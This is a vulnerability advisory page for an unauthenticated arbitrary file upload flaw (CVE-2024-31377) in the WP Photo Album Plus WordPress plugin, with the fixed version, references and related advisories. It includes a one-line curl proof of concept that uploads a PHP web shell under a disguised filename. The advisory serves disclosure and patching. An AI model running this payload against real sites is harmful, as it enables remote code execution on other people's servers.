WP Photo Album Plus < 8.7.01.002 – Unauthenticated Arbitrary File Upload | CVE 2024-31377 | Plugin Vulnerabilities

Description

The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the import functionality and no capability check in all versions up to, and including, 8.7.01.001. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Proof of Concept

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -F 'action=wppa' -F 'wppa-action=do-import-upload' -F 'blah[]=@shell.php;filename="shell.jpg?.php"'

Affects Plugins

wp-photo-album-plus

Fixed in 8.7.01.002

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/cfbc7f74-89c6-4418-9e1e-12650e179912

Miscellaneous

Original Researcher

stealthcopter

Verified

No

WPVDB ID

4ca2a31e-9d2a-4d46-9fce-0f55067310e9

Timeline

Publicly Published

2024-05-07 (about 2 years ago)

Added

2024-05-16 (about 2 years ago)

Last Updated

2026-01-27 (about 5 months ago)

Other

Published

Title

Published

2024-07-11

Title

Realtyna Organic IDX plugin < 4.14.14 - Admin+ Arbitrary File Upload

Published

2019-04-11

Title

Ninja Forms File Uploads Extension <= 3.0.22 - Unauthenticated Arbitrary File Upload

Published

2024-01-31

Title

Icons Font Loader < 1.1.5 - Authenticated(Administrator+) Arbitrary File Upload

Published

2024-10-15

Title

JiangQie Free Mini Program <= 2.5.2 - Unauthenticated Arbitrary File Uplaod

Published

2021-04-11

Title

Business Directory Plugin < 5.11.1 - Authenticated PHP4 Upload to RCE